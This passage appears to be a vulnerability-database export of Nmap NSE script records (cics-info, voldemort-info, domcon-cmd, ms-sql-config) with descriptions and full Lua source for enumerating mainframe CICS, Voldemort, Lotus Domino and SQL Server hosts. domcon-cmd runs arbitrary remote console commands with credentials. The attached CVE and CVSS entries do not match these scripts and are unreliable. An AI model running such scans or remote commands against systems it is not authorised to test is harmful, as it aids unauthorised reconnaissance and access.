stringaux.strsplit(\";%s*\", commands)\n for i = 1, #run do\n stdnse.debug(1,\"Issuing Command (#%s of %s): %s\", i, #run ,run[i])\n tn:send_cursor(run[i])\n tn:get_all_data()\n tn:get_screen_debug(2)\n end\n tn:get_all_data()\n tn:get_screen_debug(2) -- for debug purposes\n -- we should technically be at CICS. So we send:\n -- * F3 to exit the CICS program\n -- * CLEAR (a tn3270 command) to clear the screen.\n -- (you need to clear before sending a transaction ID)\n -- * a known default CICS transaction ID with predictable outcome\n -- (CESF with 'Sign-off is complete.' as the result)\n -- to confirm that we were in CICS. If so we return true\n -- otherwise we return false\n local count = 1\n while not tn:isClear() and count < 6 do\n -- some systems will just kick you off others are slow in responding\n -- this loop continues to try getting out of CESL 6 times. If it can't\n -- then we probably weren't in CICS to begin with.\n if tn:find(\"Signon\") then\n stdnse.debug(2,\"Found CESL/CESN 'Signon' sending PF3\")\n tn:send_pf(3)\n tn:get_all_data()\n end\n tn:get_all_data()\n stdnse.debug(2,\"Clearing the Screen\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n count = count + 1\n end\n if count == 6 then\n return false, msg\n end\n stdnse.debug(2,\"Sending CESF (CICS Default Sign-off)\")\n tn:send_cursor('CESF')\n tn:get_all_data()\n if tn:isClear() then\n tn:get_all_data(1000)\n end\n tn:get_screen_debug(2)\n\n if not tn:find('off is complete.') then\n return false, 'Unable to get to CICS. Try --script-args cics-info.commands=\"logon applid(<applid>)\"'\n end\n\n\n if user and pass then -- We're doing authenticated CICS testing now baby!\n stdnse.verbose(2,'Logging in with %s / %s for auth testing', user, pass)\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n tn:send_cursor('CESN')\n tn:get_all_data()\n tn:get_screen_debug(2)\n local fields = tn:writeable() -- Get the writeable field areas\n local user_loc = {fields[1][1],user} -- This is the 'UserID:' field\n local pass_loc = {fields[3][1],pass} -- This is the 'Password:' field ([2] is a group ID)\n stdnse.verbose('Trying CICS: %s : %s', user, pass)\n tn:send_locations({user_loc,pass_loc})\n tn:get_all_data()\n stdnse.debug(2,\"Screen Received for User ID: %s / %s\", user, pass)\n tn:get_screen_debug(2)\n count = 1\n while not tn:find('DFHCE3549') and count < 6 do\n tn:get_all_data(1000) -- loop for 6 seconds\n tn:get_screen_debug(2)\n count = count + 1\n end\n if not tn:find('DFHCE3549') then\n msg = 'Unable to access CICS with User: '..user..' / Pass: '..pass\n return false, msg\n end\n end\n -- By now it's time to start trying to gather information\n tn:send_clear()\n tn:get_all_data()\n tn:send_cursor('CESN')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n results[\"Security\"] = tn:find('DFHCE3547') and \"Enabled\" or \"Disabled\"\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE SYSTEM'\")\n tn:send_cursor('CEMT INQUIRE SYSTEM')\n tn:get_all_data()\n tn:get_screen_debug(2)\n if tn:find('DFHAC2002') then\n results[\"Error\"] = 'CEMT Access Denied.'\n return true, results\n elseif tn:find('NOT AUTHORIZED') then\n results[\"System\"] = \"CEMT 'INQUIRE SYSTEM' Access Denied.\"\n else\n local sysresults = stdnse.output_table()\n local l1, l2 = tn:find('Oslevel')\n local oslevel = tn:get_screen_raw():sub(l2+2,l2+7)\n l1, l2 = tn:find('Cicstslevel')\n local cicstslevel = tn:get_screen_raw():sub(l2+2,l2+7)\n l1, l2 = tn:find('Dfltuser')\n local Dfltuser = tn:get_screen_raw():sub(l2+2,l2+10)\n local Dfltuser_len = Dfltuser:find(')')\n l1, l2 = tn:find('Db2conn')\n local Db2conn = tn:get_screen_raw():sub(l2+2,l2+10)\n local Db2conn_len = Db2conn:find(')')\n l1, l2 = tn:find('Mqconn')\n local Mqconn = tn:get_screen_raw():sub(l2+2,l2+10)\n local Mqconn_len = Mqconn:find(')')\n l1, l2 = tn:find('SYSID')\n local SYSID = tn:get_screen_raw():sub(l2+2,l2+10)\n local SYSID_len = SYSID:find('\\00')\n l1, l2 = tn:find('APPLID')\n local APPLID = tn:get_screen_raw():sub(l2+2,l2+10)\n local APPLID_len = APPLID:find('\\00')\n sysresults[\"z/OS Version\"] = (\"%s.%s.%s\"):format( oslevel:sub(1,2),oslevel:sub(3,4),oslevel:sub(5,6) )\n sysresults[\"CICS Version\"] = (\"%s.%s.%s\"):format( cicstslevel:sub(1,2),cicstslevel:sub(3,4),cicstslevel:sub(5,6) )\n sysresults[\"System ID\"] = SYSID:sub(1,SYSID_len-1)\n sysresults[\"Application ID\"] = APPLID:sub(1,APPLID_len-1)\n sysresults[\"Default User\"] = Dfltuser:sub(1,Dfltuser_len-1)\n if Db2conn_len > 1 then\n sysresults[\"DB2 Connection\"] = Db2conn:sub(1,Db2conn_len-1)\n end\n if Mqconn_len > 1 then\n sysresults[\"MQ Connection\"] = Mqconn:sub(1,Mqconn_len-1)\n end\n results[\"System\"] = sysresults\n end -- Done with INQUIRE SYSTEM\n\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE DSNAME'\")\n tn:send_cursor('CEMT INQUIRE DSNAME')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n if tn:find('NOT AUTHORIZED') then\n results[\"Datasets\"] = \"CEMT 'INQUIRE DSNAME' Access Denied.\"\n else\n local datasets = {}\n while more do\n more = false\n for line in tn:get_screen():gmatch(\"[^\\r\\n]+\") do\n if line:find('Dsn') then\n table.insert(datasets,line:sub(line:find('%(')+1, line:find(')')-1):match( \"(.-)%s*$\" ))\n if count >= 9 and line:find('+') then\n more = true\n count = 1\n stdnse.debug(2,\"Sending F11\")\n tn:send_pf(11)\n tn:get_all_data()\n tn:get_screen_debug(2)\n else\n count = count + 1\n end\n end\n end\n end\n results[\"Datasets\"] = datasets\n end -- Done with DSNAME\n\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE LIBRARY'\")\n tn:send_cursor('CEMT INQUIRE LIBRARY')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n if tn:find('NOT AUTHORIZED') then\n results[\"Libraries\"] = \"CEMT 'INQUIRE LIBRARY' Access Denied.\"\n else\n local libraries = {}\n for line in tn:get_screen():gmatch(\"[^\\r\\n]+\") do\n if line:find('Dsname') then\n table.insert(libraries,line:sub(line:find('%(')+1, line:find(')')-1):match( \"(.-)%s*$\" ))\n end\n end\n results[\"Libraries\"] = libraries\n end -- Done with Library\n\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE TASK'\")\n tn:send_cursor('CEMT INQUIRE TASK')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n if tn:find('NOT AUTHORIZED') then\n results[\"Users\"] = \"CEMT 'INQUIRE TASK' Access Denied.\"\n else\n count = 1\n more = true\n local users = {}\n while more do\n more = false\n for line in tn:get_screen():gmatch(\"[^\\r\\n]+\") do\n if line:find('Use') then\n table.insert(users,line:sub(line:find('Use')+4, line:find(')',line:find('Use'))-1):match( \"(.-)%s*$\" ))\n if count >= 9 and line:find('+') then\n more = true\n count = 1\n stdnse.debug(2,\"Sending F11\")\n tn:send_pf(11)\n tn:get_all_data()\n tn:get_screen_debug(2)\n else\n count = count + 1\n end\n end\n end\n end\n results[\"Users\"] = users\n end -- End of TASK\n\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE TRANSACTION(\".. trans ..\") en'\")\n tn:send_cursor('CEMT INQUIRE TRANSACTION('.. trans ..') en')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n if tn:find('NOT AUTHORIZED') then\n results[\"Transaction / Program\"] = \"CEMT 'INQUIRE TRANSACION' Access Denied.\"\n else\n local transactions = {}\n count = 1\n more = true\n local tra, pro = ''\n while more do\n more = false\n for line in tn:get_screen():gmatch(\"[^\\r\\n]+\") do\n if line:find('Tra%(') then\n tra = line:sub(line:find('%(')+1,line:find(')')-1)\n pro = line:sub(line:find('Pro%(')+4,line:find(')',line:find('Pro%('))-1)\n table.insert(transactions,tra..' / '..pro)\n if count >= 9 and line:find('+') then\n more = true\n count = 1\n stdnse.debug(2,\"Sending F11\")\n tn:send_pf(11)\n tn:get_all_data()\n tn:get_screen_debug(2)\n else\n count = count + 1\n end\n end\n end\n end\n results[\"Transaction / Program\"] = transactions\n end -- Done with Transaction IDs\n tn:disconnect()\n return true, results\nend\n\n\naction = function(host, port)\n local commands = stdnse.get_script_args(SCRIPT_NAME .. '.commands') or 'cics'-- VTAM commands/macros to get to CICS\n local username = stdnse.get_script_args(SCRIPT_NAME .. '.user') or nil\n local password = stdnse.get_script_args(SCRIPT_NAME .. '.pass') or nil\n if (username or password) and not (username and password) then\n stdnse.verbose1(\"Both 'user' and 'pass' are required for CICS auth\")\n end\n local CEMT = stdnse.get_script_args(SCRIPT_NAME .. '.cemt') or 'cemt' -- to supply a different transaction ID if they've changed it\n local transaction = stdnse.get_script_args(SCRIPT_NAME .. '.trans') or '*'\n local status, results = cics_info(host, port, commands, username, password, CEMT, transaction)\n -- Report results. Only report an error if\n -- script args were set or the service is definitely TN3270\n if status or username or password or port.service == \"tn3270\" then\n return results\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:40", "description": "Retrieves cluster and store information from the Voldemort distributed key-value store using the Voldemort Native Protocol.\n\n## Example Usage \n \n \n nmap -p 6666 --script voldemort-info <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 6666/tcp open irc\n | voldemort-info:\n | Cluster\n | Name: mycluster\n | Id: 0\n | Host: localhost\n | HTTP Port: 8081\n | TCP Port: 6666\n | Admin Port: 6667\n | Partitions: 0, 1\n | Stores\n | test\n | Persistence: bdb\n | Description: Test store\n | Owners: harry@hogwarts.edu, hermoine@hogwarts.edu\n | Routing strategy: consistent-routing\n | Routing: client\n | wordcounts\n | Persistence: read-only\n | Routing strategy: consistent-routing\n |_ Routing: client\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-31T20:32:37", "type": "nmap", "title": "voldemort-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:VOLDEMORT-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/voldemort-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves cluster and store information from the Voldemort distributed key-value store using the Voldemort Native Protocol.\n]]\n\n---\n-- @usage\n-- nmap -p 6666 --script voldemort-info <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 6666/tcp open irc\n-- | voldemort-info:\n-- | Cluster\n-- | Name: mycluster\n-- | Id: 0\n-- | Host: localhost\n-- | HTTP Port: 8081\n-- | TCP Port: 6666\n-- | Admin Port: 6667\n-- | Partitions: 0, 1\n-- | Stores\n-- | test\n-- | Persistence: bdb\n-- | Description: Test store\n-- | Owners: harry@hogwarts.edu, hermoine@hogwarts.edu\n-- | Routing strategy: consistent-routing\n-- | Routing: client\n-- | wordcounts\n-- | Persistence: read-only\n-- | Routing strategy: consistent-routing\n-- |_ Routing: client\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(6666, \"vp3\", \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n-- Connect to the server and make sure it supports the vp3 protocol\n-- @param host table as received by the action method\n-- @param port table as received by the action method\n-- @return status true on success, false on failure\n-- @return socket connected to the server\nlocal function connect(host, port)\n local socket = nmap.new_socket()\n socket:set_timeout(5000)\n\n local status, err = socket:connect(host, port)\n if ( not(status) ) then\n return false, \"Failed to connect to server\"\n end\n\n status, err = socket:send(\"vp3\")\n if ( not(status) ) then\n return false, \"Failed to send request to server\"\n end\n\n local response\n status, response = socket:receive_bytes(2)\n if ( not(status) ) then\n return false, \"Failed to receive response from server\"\n elseif( response ~= \"ok\" ) then\n return false, \"Unsupported protocol\"\n end\n return true, socket\nend\n\n-- Get Voldemort metadata\n-- @param socket connected to the server\n-- @param file the xml file to retrieve\n-- @return status true on success false on failure\n-- @return data string as received from the server\nlocal function getMetadata(socket, file)\n\n local req = \"\\x01\\x00\" .. string.pack(\">s1x I4 s1x\", \"metadata\", 0, file)\n local status, err = socket:send(req)\n if ( not(status) ) then\n return false, \"Failed to send request to server\"\n end\n local status, data = socket:receive_bytes(10)\n if ( not(status) ) then\n return false, \"Failed to receive response from server\"\n end\n local len = string.unpack(\">I2\", data, 9)\n while( #data < len - 2 ) do\n local status, tmp = socket:receive_bytes(len - 2 - #data)\n if ( not(status) ) then\n return false, \"Failed to receive response from server\"\n end\n data = data .. tmp\n end\n return true, data\nend\n\n\naction = function(host, port)\n\n -- table of variables to query the server\n local vars = {\n [\"cluster\"] = {\n { key = \"Name\", match = \"<cluster>.-<name>(.-)</name>\" },\n { key = \"Id\", match = \"<cluster>.-<server>.-<id>(%d-)</id>.-</server>\" },\n { key = \"Host\", match = \"<cluster>.-<server>.-<host>(%w-)</host>.-</server>\" },\n { key = \"HTTP Port\", match = \"<cluster>.-<server>.-<http%-port>(%d-)</http%-port>.-</server>\" },\n { key = \"TCP Port\", match = \"<cluster>.-<server>.-<socket%-port>(%d-)</socket%-port>.-</server>\" },\n { key = \"Admin Port\", match = \"<cluster>.-<server>.-<admin%-port>(%d-)</admin%-port>.-</server>\" },\n { key = \"Partitions\", match = \"<cluster>.-<server>.-<partitions>([%d%s,]*)</partitions>.-</server>\" },\n },\n [\"store\"] = {\n { key = \"Persistence\", match = \"<store>.-<persistence>(.-)</persistence>\" },\n { key = \"Description\", match = \"<store>.-<description>(.-)</description>\" },\n { key = \"Owners\", match = \"<store>.-<owners>(.-)</owners>\" },\n { key = \"Routing strategy\", match = \"<store>.-<routing%-strategy>(.-)</routing%-strategy>\" },\n { key = \"Routing\", match = \"<store>.-<routing>(.-)</routing>\" },\n },\n }\n\n -- connect to the server\n local status, socket = connect(host, port)\n if ( not(status) ) then\n return fail(socket)\n end\n\n -- get the cluster meta data\n local status, response = getMetadata(socket, \"cluster.xml\")\n if ( not(status) or not(response:match(\"<cluster>.*</cluster>\")) ) then\n return\n end\n\n -- Get the cluster details\n local cluster_tbl = { name = \"Cluster\" }\n for _, item in ipairs(vars[\"cluster\"]) do\n local val = response:match(item.match)\n if ( val ) then\n table.insert(cluster_tbl, (\"%s: %s\"):format(item.key, val))\n end\n end\n\n -- get the stores meta data\n local status, response = getMetadata(socket, \"stores.xml\")\n if ( not(status) or not(response:match(\"<stores>.-</stores>\")) ) then\n return\n end\n\n local result, stores = {}, { name = \"Stores\" }\n table.insert(result, cluster_tbl)\n\n -- iterate over store items\n for store in response:gmatch(\"<store>.-</store>\") do\n local name = store:match(\"<store>.-<name>(.-)</name>\")\n local store_tbl = { name = name or \"unknown\" }\n\n for _, item in ipairs(vars[\"store\"]) do\n local val = store:match(item.match)\n if ( val ) then\n table.insert(store_tbl, (\"%s: %s\"):format(item.key, val))\n end\n end\n table.insert(stores, store_tbl)\n end\n table.insert(result, stores)\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:39", "description": "Runs a console command on the Lotus Domino Console using the given authentication credentials (see also: domcon-brute)\n\n## Script Arguments \n\n#### domcon-cmd.cmd \n\nThe command to run on the remote server\n\n#### domcon-cmd.pass \n\nThe password used to authenticate to the server\n\n#### domcon-cmd.user \n\nThe user used to authenticate to the server\n\n## Example Usage \n \n \n nmap -p 2050 <host> --script domcon-cmd --script-args domcon-cmd.cmd=\"show server\", \\\n domcon-cmd.user=\"Patrik Karlsson\",domcon-cmd.pass=\"secret\"\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 2050/tcp open unknown syn-ack\n | domcon-cmd:\n | show server\n |\n | Lotus Domino (r) Server (Release 8.5 for Windows/32) 2010-07-30 00:52:58\n |\n | Server name: server1/cqure - cqure testing server\n | Domain name: cqure\n | Server directory: C:\\Program Files\\IBM\\Lotus\\Domino\\data\n | Partition: C.Program Files.IBM.Lotus.Domino.data\n | Elapsed time: 00:27:11\n | Transactions/minute: Last minute: 0; Last hour: 0; Peak: 0\n | Peak # of sessions: 0 at\n | Transactions: 0 Max. concurrent: 20\n | ThreadPool Threads: 20 (TCPIP Port)\n | Availability Index: 100 (state: AVAILABLE)\n | Mail Tracking: Not Enabled\n | Mail Journalling: Not Enabled\n | Number of Mailboxes: 1\n | Pending mail: 0 Dead mail: 0\n | Waiting Tasks: 0\n | DAOS: Not Enabled\n | Transactional Logging: Not Enabled\n | Fault Recovery: Not Enabled\n | Activity Logging: Not Enabled\n | Server Controller: Enabled\n | Diagnostic Directory: C:\\Program Files\\IBM\\Lotus\\Domino\\data\\IBM_TECHNICAL_SUPPORT\n | Console Logging: Enabled (1K)\n | Console Log File: C:\\Program Files\\IBM\\Lotus\\Domino\\data\\IBM_TECHNICAL_SUPPORT\\console.log\n |_ DB2 Server: Not Enabled\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-19T23:02:58", "type": "nmap", "title": "domcon-cmd NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:DOMCON-CMD.NSE", "href": "https://nmap.org/nsedoc/scripts/domcon-cmd.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nRuns a console command on the Lotus Domino Console using the given authentication credentials (see also: domcon-brute)\n]]\n\n---\n-- @usage\n-- nmap -p 2050 <host> --script domcon-cmd --script-args domcon-cmd.cmd=\"show server\", \\\n-- domcon-cmd.user=\"Patrik Karlsson\",domcon-cmd.pass=\"secret\"\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 2050/tcp open unknown syn-ack\n-- | domcon-cmd:\n-- | show server\n-- |\n-- | Lotus Domino (r) Server (Release 8.5 for Windows/32) 2010-07-30 00:52:58\n-- |\n-- | Server name: server1/cqure - cqure testing server\n-- | Domain name: cqure\n-- | Server directory: C:\\Program Files\\IBM\\Lotus\\Domino\\data\n-- | Partition: C.Program Files.IBM.Lotus.Domino.data\n-- | Elapsed time: 00:27:11\n-- | Transactions/minute: Last minute: 0; Last hour: 0; Peak: 0\n-- | Peak # of sessions: 0 at\n-- | Transactions: 0 Max. concurrent: 20\n-- | ThreadPool Threads: 20 (TCPIP Port)\n-- | Availability Index: 100 (state: AVAILABLE)\n-- | Mail Tracking: Not Enabled\n-- | Mail Journalling: Not Enabled\n-- | Number of Mailboxes: 1\n-- | Pending mail: 0 Dead mail: 0\n-- | Waiting Tasks: 0\n-- | DAOS: Not Enabled\n-- | Transactional Logging: Not Enabled\n-- | Fault Recovery: Not Enabled\n-- | Activity Logging: Not Enabled\n-- | Server Controller: Enabled\n-- | Diagnostic Directory: C:\\Program Files\\IBM\\Lotus\\Domino\\data\\IBM_TECHNICAL_SUPPORT\n-- | Console Logging: Enabled (1K)\n-- | Console Log File: C:\\Program Files\\IBM\\Lotus\\Domino\\data\\IBM_TECHNICAL_SUPPORT\\console.log\n-- |_ DB2 Server: Not Enabled\n--\n-- @args domcon-cmd.cmd The command to run on the remote server\n-- @args domcon-cmd.user The user used to authenticate to the server\n-- @args domcon-cmd.pass The password used to authenticate to the server\n--\n\n--\n-- Version 0.1\n-- Created 07/30/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"auth\"}\n\n\nportrule = shortport.port_or_service(2050, \"dominoconsole\", \"tcp\", \"open\")\n\n--- Reads an API block from the server\n--\n-- @param socket already connected to the server\n-- @return status true on success, false on failure\n-- @return result table containing lines with server response\n-- or error message if status is false\nlocal function readAPIBlock( socket )\n\n local lines\n local result = {}\n local status, line = socket:receive_lines(1)\n\n if ( not(status) ) then return false, \"Failed to read line\" end\n lines = stringaux.strsplit( \"\\n\", line )\n\n for _, line in ipairs( lines ) do\n if ( not(line:match(\"BeginData\")) and not(line:match(\"EndData\")) ) then\n table.insert(result, line)\n end\n end\n\n -- Clear trailing empty lines\n while( true ) do\n if ( result[#result] == \"\" ) then\n table.remove(result, #result)\n else\n break\n end\n end\n\n return true, result\n\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n local socket = nmap.new_socket()\n local result_part, result, cmds = {}, {}, {}\n local user = stdnse.get_script_args('domcon-cmd.user')\n local pass = stdnse.get_script_args('domcon-cmd.pass')\n local cmd = stdnse.get_script_args('domcon-cmd.cmd')\n\n if( not(cmd) ) then return fail(\"No command supplied (see domcon-cmd.cmd)\") end\n if( not(user)) then return fail(\"No username supplied (see domcon-cmd.user)\") end\n if( not(pass)) then return fail(\"No password supplied (see domcon-cmd.pass)\") end\n\n cmds = stringaux.strsplit(\";%s*\", cmd)\n\n socket:set_timeout(10000)\n local status = socket:connect( host, port )\n if ( status ) then\n socket:reconnect_ssl()\n end\n\n socket:send(\"#API\\n\")\n socket:send( (\"#UI %s,%s\\n\"):format(user,pass) )\n socket:receive_lines(1)\n socket:send(\"#EXIT\\n\")\n\n for i=1, #cmds do\n socket:send(cmds[i] .. \"\\n\")\n status, result_part = readAPIBlock( socket )\n if( status ) then\n result_part.name = cmds[i]\n table.insert( result, result_part )\n else\n return fail(result_part)\n end\n end\n\n socket:close()\n\n return stdnse.format_output( true, result )\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:50", "description": "Queries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers, and configuration settings. \n\nSQL Server credentials required: Yes (use `ms-sql-brute`, `ms-sql-empty-password` and/or `mssql.username` & `mssql.password`) Run criteria: \n\n * Host script: Will run if the `mssql.instance-all`, `mssql.instance-name`\nor `mssql.instance-port` script arguments are used (see mssql.lua). \n\n * Port script: Will run against any services identified as SQL Servers, but only \nif the `mssql.instance-all`, `mssql.instance-name` and `mssql.instance-port` script arguments are NOT used. \n\nNOTE: Communication with instances via named pipes depends on the `smb` library. To communicate with (and possibly to discover) instances via named pipes, the host must have at least one SMB port (e.g. TCP 445) that was scanned and found to be open. Additionally, named pipe connections may require Windows authentication to connect to the Windows host (via SMB) in addition to the authentication required to connect to the SQL Server instances itself. See the documentation and arguments for the `smb` library for more information. \n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate with ports that were not included in the port list for the Nmap scan. This can be disabled using the `mssql.scanned-ports-only` script argument.\n\n## Script Arguments \n\n#### ms-sql-config.showall \n\nIf set, shows all configuration options.\n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=sa <host>\n \n\n## Script Output \n \n \n | ms-sql-config:\n | [192.168.100.25\\MSSQLSERVER]\n | Databases\n | name db_size owner\n | ==== ======= =====\n | nmap 2.74 MB MAC-MINI\\david\n | Configuration\n | name value inuse description\n | ==== ===== ===== ===========\n | SQL Mail XPs 0 0 Enable or disable SQL Mail XPs\n | Database Mail XPs 0 0 Enable or disable Database Mail XPs\n | SMO and DMO XPs 1 1 Enable or disable SMO and DMO XPs\n | Ole Automation Procedures 0 0 Enable or disable Ole Automation Procedures\n | xp_cmdshell 0 0 Enable or disable command shell\n | Ad Hoc Distributed Queries 0 0 Enable or disable Ad Hoc Distributed Queries\n | Replication XPs 0 0 Enable or disable Replication XPs\n | Linked Servers\n | srvname srvproduct providername\n | ======= ========== ============\n |_ MAC-MINI SQL Server SQLOLEDB\n \n\n## Requires \n\n * [mssql](<../lib/mssql.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-04-04T10:11:54", "type": "nmap", "title": "ms-sql-config NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2022-01-03T21:08:52", "id": "NMAP:MS-SQL-CONFIG.NSE", "href": "https://nmap.org/nsedoc/scripts/ms-sql-config.html", "sourceData": "local mssql = require \"mssql\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\n-- -*- mode: lua -*-\n-- vim: set filetype=lua :\n\ndescription = [[\nQueries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers,\nand configuration settings.\n\nSQL Server credentials required: Yes (use <code>ms-sql-brute</code>, 